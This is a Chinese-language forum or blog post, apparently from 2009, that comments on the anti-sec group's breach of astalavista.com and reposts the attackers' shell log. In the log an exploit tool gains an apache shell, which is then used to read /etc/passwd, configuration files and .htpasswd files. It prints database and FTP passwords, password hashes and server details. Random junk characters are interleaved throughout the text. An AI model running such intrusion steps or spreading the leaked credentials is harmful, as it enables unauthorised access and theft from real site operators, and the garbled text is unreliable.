里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
; P0 `+ e& s: j, ~; ~+ ~. T2 l: d) B( `& ^7 @3 Y3 N! A$ h
[root@front3 ~]# curl -I litespeedtech.com
* r8 `# f: R1 l2 ]2 c& {3 j5 OHTTP/1.1 200 OK* H9 Z7 }( f0 O. }
Date: Fri, 05 Jun 2009 22:54:51 GMT5 P* T4 x3 g. C7 E' M4 z! a4 N# P
Server: LiteSpeed8 u4 f2 X: F$ G+ G
( N8 h' @* E% e6 ~/ _4 g' p5 h9 ?+ Q7 x
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-0 l+ C( v) l3 g) S5 l$ s8 i
Z, \. n+ o) m% K1 H6 j
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
% R/ P3 N z" I
6 N2 t* r M6 P0 Q- D G) p
( |2 B+ D" ^4 l M0 g& X/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ - y" T( n8 b1 V1 f. \5 Q
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \) L- Y3 H: F1 I5 u. |% q3 K
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \0 j9 F' g# n0 E" e9 b. d) ^+ t
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
( A- ^5 x8 d+ Q( X \/ \/ \/ \/ \/ \/ \/7 h% q2 j& U) d! N9 {+ F
The Hacking & Security Community
; r# ?/ u4 V- a[+] Founded in 1997 by a hacker computer enthusiast
4 l. _. K* `* [$ p1 X7 C[-] Exposed in 2009 by anti-sec group
3 x5 @( u+ E6 A) F. o5 y E4 w7 r- h8 d% K
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:' z3 m5 |! K# v7 O$ f; q* T! B5 }
>> 03. Who’s behind the site?
, O) D J8 y# P( [" B>>
. d5 T( ^8 Y4 w>> A team of security and IT professionals, and a countless number of contributors from all over the world.. U) z6 l8 K7 F, M
- W- Q2 h* q5 D6 ^, G/ L% ~; y' N
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?! N+ F, L* t$ m% `* W% p) Z2 P+ }3 A
>>1 {' j% Q p# v. j3 a' L
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
+ D& f" x+ Z7 j3 `" fmilitary institutions.9 r) D7 n* ]* E! R# `
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
+ M" q2 z: n& ]& w% |+ n2 z! r5 z0 F1 \: t, U. Q
Why has Astalavista been targeted?0 j. c4 s4 v- v0 ]( ~
9 W4 t% u0 w0 W' |1 G8 T6 ~Other than the fact that they are not doing any of this for the “community” but
) ^0 Q4 S2 A2 e' a- M( d/ E+ efor the money, they spread exploits for kids, claim to be a security community
$ n' t4 A1 D6 F* T+ e5 g; ~2 b$ N(with no real sense of security on their own servers), and they charge you $6.664 B5 Z# A# j, n: s
per months to access a dead forum with a directory filled with public releases
) F; t( G0 @, }- \and outdated / broken services.9 s1 V# [ I( |) f+ I1 f, V, P
6 r( X" ]3 U# Z* I! t" O! A) ]7 YWe wanted to see how good that “team of security and IT professionals” really is.8 S" F; v( ]2 j3 T) r% j# \
. y( W. p3 I$ A2 b9 U+ i9 SLet’s begin.
$ m. D9 \7 b, b+ p9 |; A3 f! a! W6 S$ o
anti-sec:~# ./g0tshell astalavista.com -p 80
3 E6 R" C1 N# `3 s& V[+] Connecting to astalavista.com:807 ]1 [( X/ [6 H7 d4 E6 S8 i
[+] Grabbing banner…' w* p4 G( Y- x, ~
LiteSpeed
: m# z+ y( x+ @, X[+] Injecting shellcode…+ ^! w# W) x8 m ~
[-] Wait for it5 h! t% I& c1 A1 }
& S0 b6 ?4 u) {/ J( S1 i$ G/ `
[~] We g0tshell
+ B2 |+ w+ K6 p* B/ Huname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux. ^- \8 y0 k) Z
ID: uid=100(apache) gid=500(apache) groups=500(apache)
. Z: q9 @+ S* c: W
5 y6 Z$ s) E. i) n! g1 Csh-3.2$ cat /etc/passwd
" h/ U V# E8 e: C3 L) g$ ]5 L# Lroot:x:0:0:root:/root:/bin/bash
1 n- c9 M0 s- U0 m; K5 {bin:x:1:1:bin:/bin:/sbin/nologin
. g- P* z! O' ]! s2 Cdaemon:x:2:2:daemon:/sbin:/sbin/nologin
; K; u: C- U$ K" r0 f7 v* u2 s% nadm:x:3:4:adm:/var/adm:/sbin/nologin
% l' h! F( ^3 u2 d( l* C) tlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
: D5 K) z/ J+ E$ I Wsync:x:5:0:sync:/sbin:/bin/sync
: F* U$ T2 v8 H% a3 `$ Oshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
$ Q5 `! _5 X0 Q. I: S" }; jhalt:x:7:0:halt:/sbin:/sbin/halt
* o% v( J+ [- x4 F& Fmail:x:8:12:mail:/var/spool/mail:/sbin/nologin/ G, J3 l$ c' q5 w1 ~
news:x:9:13:news:/etc/news:
& C- [# J0 d+ q1 I5 i* Wuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
3 K! d, X6 B+ a+ E2 A7 W+ l, Xoperator:x:11:0 perator:/root:/sbin/nologin
, e$ H% w8 J- I& v- ]" p# ngames:x:12:100:games:/usr/games:/sbin/nologin2 C- V1 |/ F) c0 m' N& D
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
1 x% h, f/ W3 P" I/ Z" W& }7 U1 h8 `ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin$ T, P: B, g+ M5 `. Y- W
nobody:x:99:99:Nobody:/:/sbin/nologin
0 D }7 C9 q, p9 f! Frpm:x:37:37::/var/lib/rpm:/sbin/nologin
, @$ o' C" K/ u8 [+ x x" Qdbus:x:81:81:System message bus:/:/sbin/nologin
: I8 A1 R% V7 p3 Z, mnscd:x:28:28:NSCD Daemon:/:/sbin/nologin1 S$ p& B6 a. t% M) m
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin! t( J% |6 y! o X3 F( ~2 g) |9 D
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
1 i: L# N. U% ?. q3 l& o# rvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
6 A4 L0 n J) d3 Zhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin
; L) J' V% k6 ^% a: k' Qrpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
! \3 O T( V% X Irpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin0 S1 H7 F8 R$ W N: ^' q. u
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin! c; ]9 `$ }2 Q% E0 X/ L
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
# X$ M+ j* S2 Ppcap:x:77:77::/var/arpwatch:/sbin/nologin' ^$ J+ `1 I- q) m
named:x:25:25:Named:/var/named:/sbin/nologin
( p d2 F9 a8 n5 T8 Zapache:x:100:500::/var/www:/bin/false
0 [% I( K) z8 W+ fdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
% I2 q; n# w9 ` ?- tmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
) q) w. U7 n2 q% }$ D$ uwebapps:x:500:501::/var/www/html:/bin/bash5 J5 O2 `; J# E7 u8 j8 _
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash2 ~* x/ w' C" A5 i
admin:x:501:502::/home/admin:/bin/bash
4 P% [& c. x6 b' {+ @jon:x:502:503::/home/jon:/bin/bash2 t- W. W; B* h& h$ R9 W2 b% b6 m5 c
com:x:503:504::/home/com:/bin/bash
7 ?$ H4 n* x) X, F. qntp:x:38:38::/etc/ntp:/sbin/nologin1 A) t8 w2 [5 }# ~* k( i
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin+ p# F+ n) z0 n8 a( A+ T8 h
astanet:x:504:505::/home/astanet:/bin/bash
$ p' d( V2 J2 R) S# x! Cavahi:x:70:70:Avahi daemon:/:/sbin/nologin
+ D$ |7 q8 J! j; ^- ~3 Ravahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
. b5 }# ]/ _* ^9 n0 v4 R2 j% l w2 e0 y4 I2 l x# Q' b8 N
sh-3.2$ cat /etc/hosts/ e& V2 ` M# f7 |8 s6 ^9 T8 Q7 E
# Do not remove the following line, or various programs. c" |0 Y: Q$ H R# n- D
# that require network functionality will fail.
9 Z% H& i# q4 c, `/ b127.0.0.1 localhost.localdomain localhost$ p. H$ Q3 P4 k
::1 localhost6.localdomain6 localhost61 Z) w, ] K2 l6 ^$ X$ q5 s
80.74.154.172 asta1.astalavistaserver.com
7 \: D/ O1 E! H( i+ E, F, V2 ^: a6 h; }
sh-3.2$ pwd
* ]/ _3 n/ d( I* h( p, m1 y2 k! W h/home/com/public_html0 S$ j T7 Q' C/ l6 R
- e# D' F2 u( F g. rsh-3.2$ ls -la* Y) W7 i) Q C7 n9 Z; q1 ?3 k
total 18460+ D0 k4 }8 D" ~3 ?
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
; _5 B! h3 ?3 N/ e( O1 r6 fdrwx–x–x 11 com com 4096 Jun 25 2008 ..
+ k/ q$ ~4 a% j" T8 R3 _drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin+ O; [/ t! I& L m
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache* j+ t' h( ^5 F% _, Z9 S3 _& i
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
9 T+ V: C, @* W1 |" l% vdrwxrwxrwx 2 com com 4096 May 19 00:50 config
) q7 T& P0 C) I4 M. | I0 _drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
/ Y% {, ~' a8 w* Bdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
$ I% ^3 H! E& zdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
5 o9 g* C6 T' K: Udrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo9 }" j* X+ y9 l! q5 \
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__) x$ F$ }2 y" ~! B9 y+ J2 A
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php& H3 U) T7 u) u4 K; b
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
" l- x" G! F, F" b& t0 l4 }drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor- S$ }8 V/ T' A3 f9 f6 [
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
' v% ]9 A9 n8 c, m) |drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
; a; A! T Z% P" C: G6 H) Y! Y-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
. {9 E" h, W3 [2 O" ^- x. w-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
' X. U0 @) P( n9 M-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak$ v" f4 Y: ]# s; u
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool9 g# ]: ?' y, H6 X0 t( K4 D4 R3 A
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images9 z4 @% K- J( ~2 d/ h$ I
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
7 D- j* k1 R/ Idrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
! M- q# j- M: Vdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
* z9 G! `5 `+ \7 Z1 F+ Y8 g6 Rdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib* o- C! @2 A1 F, E* E: j( \; X
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media0 K3 j7 _% f# m4 }* u
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications* X, O1 A- s7 x* [4 O* h
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
) E# s9 x0 Y7 ddrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
3 f& q3 t' K8 E0 [- \drwxrwxr-x 22 com com 4096 May 28 17:06 _new
" Y/ U' f' R: wdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
' c4 M) }. L' E" Edrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy' E$ g) ~, w6 g a
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy0 }: o0 {& s8 x" \7 J, f; d
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt- I5 b' m$ q+ j' D. `! j
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml r( y( P0 R. }2 n A
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php; [/ K( \- S8 B
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
! c1 k" M2 f1 s* @drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
0 i+ G. i$ G& E$ m1 jdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
' O, _, q/ i0 x3 x' W# c' s3 N L( _' d5 t+ i5 m: M. c
sh-3.2$ head -20 index.php+ z+ u) n9 v) R, P+ Z
<?php
+ D1 _8 f% W$ U% i: n" K5 e0 t a! r- |
/**
0 B) D [, l: S2 T; w) v, ]+ |* M z$ {* The main page for the CMS
! \. D! a4 u P5 G8 i# d; G* @copyright CONTREXX CMS - COMVATION AG2 R; k# N5 X) h3 m
* @author Comvation Development Team5 l) G2 c5 E! \" x& z7 W: Y E" k
* @version v1.0.9.10.1 stable+ v' V* m, T# i2 M& p
* @package contrexx7 U+ n+ p# G4 W6 L+ c
* @subpackage core: T! p5 t# N4 H% w% j) k
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
C' A( X; p9 Z* q* @since v0.0.0.0; m$ T7 ?1 C+ S A
* @todo Capitalize all class names in project' M* W: r' @% z& a& H
* @uses /config/configuration.php' [' k, e2 B' s% A1 t% H# ?
* @uses /config/settings.php
& e7 T; l( A* q. Y# ?: O$ B' A* @uses /config/version.php
% C9 E9 L. @$ H" ]( w* @uses /core/API.php
0 \2 a# h9 I$ m' o5 x% T- M* @uses /core_modules/cache/index.class.php
# L8 |. Z# ]6 @3 i. f8 {& e2 k- C* @uses /core/error.class.php( Q- x4 e8 N7 {+ n
* @uses /core_modules/banner/index.class.php
1 H2 q" v' g" ?! {8 K* @uses /core_modules/contact/index.class.php8 N" S" H& f3 ?! |! ]
9 Z& _( i2 G# T1 |% U% N0 T m! psh-3.2$ cd config/
, [1 _6 E' [5 D- v" Y$ Msh-3.2$ ls -la
! v) i0 Q4 m9 m& ytotal 32
) m3 w" i. H$ {2 @( a# R+ ^drwxrwxrwx 2 com com 4096 May 19 00:50 .
/ Y( y; v$ Z/ A& Jdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..7 l* `+ r" N' K+ K1 C
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
3 Z: w( \9 m0 x0 H-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php+ R V( U5 p$ O9 n9 B# H+ ]
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php6 s' O) z/ V3 }" Q3 N& ~
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
n) R5 w: W6 i) D: p
4 y: o$ _ T a) X: Wsh-3.2$ cat configuration.php% R# @5 T% p' u) z, K9 O2 i
[snip]
9 D E- g* x1 J. B! }' ^$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost0 C. H" m& D5 O% H4 ]# q' H
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name8 C5 M0 H+ v4 ]7 |
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix# \" V. B6 a4 s U& n$ K
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
8 U( ?" m" _/ w- `$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password, X" l0 t4 P0 C' Q& V/ D
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
7 j4 w4 e) \0 n, N$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
$ e+ L0 H. V; |% T% W7 Z. j[snip]
( F$ e& a! r- C: ~' Y$_FTPCONFIG['is_activated'] = true; // Ftp support true or false! E9 ?/ w: A. }9 y3 S4 |9 c
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
+ T1 m% D W9 X1 S- W$ S, J$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost6 v) r* z5 r8 I
$_FTPCONFIG['port'] = 21; // Ftp remote port
! A7 S0 b! \2 O0 I! O; P$ N( T$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
* Q( W! l: i, }& X$ Z$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
) A5 V0 h, ]6 Y Q. D/ ~$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
& T) O( F2 f" N$ {9 n. ~
6 a, q2 U; ^% w/ y3 g ~sh-3.2$ cd ..$ x: r4 X" Q D% A0 w! r- n+ A
sh-3.2$ cd dvd/
; G( \+ f/ o% [4 Tsh-3.2$ ls -la
6 P3 l- Q- ^. [( h0 Gtotal 29137803 l* A1 \( B' J: s5 ?% j
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
: P/ c; R! I2 K4 N* t! t6 H, i9 xdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..- X# s6 \% G* H* F; z4 Y" a$ E. `8 a
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
5 W8 s: w8 k0 K; k. U) M' Z' l-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar0 E4 y- X# D& k9 p2 j
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar* e: q7 }# `; q0 R
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
, R h$ M8 }$ H0 `7 C6 w
& P- g8 ^. G4 B8 f( ssh-3.2$ cat .htaccess) s" y# V8 n. x+ S3 ]8 p, B# z
authType Basic
+ L5 U1 v1 H# U1 TauthName DVD7 A9 ]" d+ A, I+ p: {+ c
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
! _) Z' y, y6 q, {* Drequire valid-user
. A0 ~# {1 Q3 D. D; V/ H; @4 O7 C( x+ C+ ?
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd# V( \: \7 i5 V+ y
DVDdownload:CRD8cuY6.MPT6$ D1 f) g" r1 {! [, D* Y
DVDdownload2:CR8a36.wluFMg
/ r" q' E- z+ v
3 n3 _5 ^. h+ { k' X4 Csh-3.2$ cat test.php) x. q* _8 v9 R0 N
<?php
) j7 X( j, o4 t: r. M) \8 p$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;" f, w0 V0 }' E5 l
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));: v- L7 l6 y* l* U& p( g
echo $url;
8 h- ~ N2 | q?>
% \! Y3 U( m# b) V. }
5 G; Y7 ^) X7 psh-3.2$ cd modifications/
8 z0 S! D5 R5 r1 u2 t8 Nsh-3.2$ ls -la
5 [, _: ~( M" ?. D: Dtotal 32
3 ?4 w% [: B, J' @5 ~ H' {/ Jdrwxr-xr-x 8 com com 4096 May 11 12:48 .. J) ]' T8 Y' \% c& `( d7 u
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
! \3 o* B9 d$ ?& zdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng2 y/ ~: }5 n+ d4 j6 ]+ h* z* _# p' d. g P' G
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
7 _, M1 k$ K7 x" T, U* Gdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
8 l+ {6 x4 F9 j; M8 `4 Kdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
+ d& g6 x; r/ S0 Gdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search
- X9 U2 N+ t/ K( R* {! odrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
+ D ~, Z* j& u4 w4 I p0 O4 ~& K$ m
sh-3.2$ ls -R
7 y3 r8 R* ]" D$ k& T* o.:
/ Q) r" u' n+ zcom_avtng cronjobs onlinetools pjirc search _tmp! F6 W8 X/ s' I9 m# M8 B2 e. ?
# _( x. D; u* B1 E/ |
./com_avtng:% ~) J, v! F3 D' V3 c# s
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
- h& {! ~) M; v( i5 f$ ?1 N- V9 k) w8 [* P8 ]" i
./com_avtng/scripts:
* y0 K. S }8 ?( _( s7 L5 vpopunder.js, A/ u- e% x5 v3 I C
* d- \3 r% E% d: D./cronjobs:
. _7 Q- U. g! |exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
/ y( q$ s/ F3 f2 S2 S
) c4 K! y: ^$ _8 e./cronjobs/tmp:4 J1 q! B' U+ F" q1 V# Y1 `) }; v6 Y
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv( h; \$ |& b0 B+ W+ ?% x
: X+ ?8 a" i. q# i; o% \$ ]
./onlinetools:
& D6 Q) p( z0 p( Rindex.php
- [7 |) y; T" s! |+ e8 m, N: ^/ I. \' h" i8 c5 y" J x5 G! p8 f
./pjirc:# V5 e# [8 j G0 {; A/ G
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
4 [* q& `$ r4 C& }5 R6 ~AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
2 }9 P; a3 [* f8 h1 }( Obackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd! s: n) ]" O; E. m6 p; }
2 U$ v3 ?! }/ B, e3 {- s$ h
./pjirc/img:7 q z9 i! ~ ]9 r- n( p9 X# d
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
! O* R3 v/ a3 |arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif $ j/ [$ s2 Y8 o' e E( d1 i
verre-eau.gif7 F5 K w$ y8 T; m
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif + u b6 |' M8 Z, o8 }. m
verre-vin.gif/ D, L) |1 }" {) F; Q
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
2 |- _2 M% D% p7 Y8 Nbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif! d' N/ ?9 Y: o: p( n2 [1 P& b( U
/ a# P3 m; d. @, {( f4 a
./pjirc/snd:* I- W" r/ u: @( x. d4 \0 ]
bell2.au ding.au! p' K4 P7 Q6 a3 f$ m
1 X! }# S9 X- J, [$ r- ?
./search: Y. b3 ?3 d* }& B( w
searchEngines.php search.php1 i' |! [/ W9 z9 a9 u j
. C% K$ a, N) h, T9 l) @
./_tmp:
" o. I, Q; c0 e t; xdefaultPorts.php defaultPorts.txt
- D+ i; D0 s, S# X* n
& W& [" V: P7 q1 ssh-3.2$ cd cronjobs/5 r' s p3 u4 c& N' J
sh-3.2$ cat exploits.php
, P" T' F O! J: A, T[snip]
; m* b; y7 b4 T$categories = array();
0 c+ [3 o# q! G6 } \5 E$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;) R' n" `; ^0 Y/ i! V4 @- N+ g# d
$expolits = file($milw0rmFile);9 E' G1 P1 H5 e2 I
$comExploits = array();/ r* n" o" r3 x" T; n: L: C7 B
[snip]+ M* }$ y5 D6 s& q7 r/ S/ @) H
// manage data6 y$ v- P5 C* y: a1 c s( B* ?
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
% ]7 r/ S6 o1 J. y+ ~% x- y1 T7 |3 M; _/ g3 j( V- V2 }
// get path and title
1 Q5 B5 A. f. l" V9 K $expolits[$x] = trim($expolits[$x]);0 G6 E9 M2 S; }# m0 o$ z: }
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));# i3 J: S- ~% Q
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
% q6 C* ?& d2 u8 P- l9 Z( U) S' W: ?% Y p" b* j/ E
// check if file exists5 N7 N! C `" S3 [. F
if (file_exists($path)) {" v! a- K* P* d0 l' S
! d5 |3 I/ V" p* P
$text = file_get_contents($path);
: I2 e9 P) ?" n6 _7 L' s7 S8 U. x- c0 h
// get content and date
* k8 q1 x/ S ?* @5 w7 |3 L* ^0 b //$text = htmlspecialchars($text, ENT_QUOTES);! b0 G' X) J p- V1 v6 `
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));3 _( o2 s+ }* X" [6 G
if ($tmptext != ”) {3 p+ z" U. t% Q/ C9 B# Q4 T& ?
$text = $tmptext;
/ A$ d- h; |$ u5 W } else {9 t5 |3 H+ B2 p+ W, L
$text = addslashes(htmlentities($text, ENT_QUOTES));) t" p' s+ k( H& \4 q
}7 j6 }1 O. y9 V0 q4 C
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));" K: \( r! ?' a4 f3 d3 C, W, r
$tmp = explode('-', $date);
7 o9 @* [1 l& D $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));0 C. m( `( e. |% D G" d; x X) b
$cat = getCategory ($path);* z& X3 Y/ H* z L- |
$ext = pathinfo(basename($path));
' b7 X( N) O! B2 o9 ] $ext = $ext['extension'];
R; `" X M- j6 z. _ $qStr = ”' K- ~; R. z$ v4 S
SELECT `id` T- m9 n6 ?, H7 |3 F! ]
FROM `contrexx_module_exploits`
% F0 t5 t9 j; R, g# j8 p WHERE `title` = ‘” . $title . “‘7 p5 X9 }2 @" W( s" y1 X
AND `date` = ‘” . $date . “‘
* g3 L6 d: R% ^+ b1 x4 s l7 G “;
+ F9 e' G- \: f F echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
/ E4 k, `# F3 J% E6 v $q = $_objDB->query($qStr);
1 Z3 Q: k* j* H3 x* l( q; b
5 S) ~$ b4 h4 T* s& e) B z* w9 h if ($q->numRows() == 0) {
" P, _5 o5 S& _6 N! U! N$ j" h1 Q# h/ U
// prepare array
& e) S" P/ y4 Z3 ]2 V. T, c $comExploits[$x]['date'] = $date;# @: K4 i2 j1 q; @7 r
$comExploits[$x]['title'] = $title;: F5 }. n7 z( m7 p# a! t3 ~# w( w
$comExploits[$x]['author'] = ‘milw0rm’;4 e; d" O7 p& Q" w
$comExploits[$x]['text'] = $text;2 K1 P* H9 g) {. \9 b# P2 T
$comExploits[$x]['source'] = $ext;0 g9 U( S0 j8 P6 o7 P
$comExploits[$x]['url1'] = ”;9 \6 m \# ~6 d& H
$comExploits[$x]['url2'] = ”;0 f* |3 _ y/ J5 e6 K- x
$comExploits[$x]['catid'] = $cat;
0 t( {& J: ^$ F( [; F+ c/ {- b $comExploits[$x]['lang'] = ‘2′;
* ~8 e: R% C4 `; L% w- ~7 y $comExploits[$x]['userid'] = ‘12′;
3 p8 S: ~5 x. h, M5 { $comExploits[$x]['startdate'] = ‘0000-00-00′;. X+ h# T( Y- J" H0 V, e- W7 t, b
$comExploits[$x]['enddate'] = ‘0000-00-00′;% k, ~) D+ d6 a! ~3 o3 d2 R
$comExploits[$x]['status'] = ‘1′;- k4 u" F Q$ b$ o( W& e/ W P
$comExploits[$x]['changelog'] = $date;
# K/ [! T2 n0 c# [4 Y
( e! b/ }3 N6 U1 d0 F2 d1 I }: H& }* D) q1 f
[snip]
1 @6 E/ n; b! u! ? $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
7 j" d* ]4 \9 \8 {" Z<rss version=”2.0″>
7 ?& B8 H9 V' }% V3 a <channel>3 Z) D: B* O5 S& ^/ o6 I
<title>ASTALAVISTA.com - Exploits</title># ?" V- {; C7 L) K+ O! |
<link>http://www.astalavista.com/exploits</link> G/ h) ^4 g" Z# a
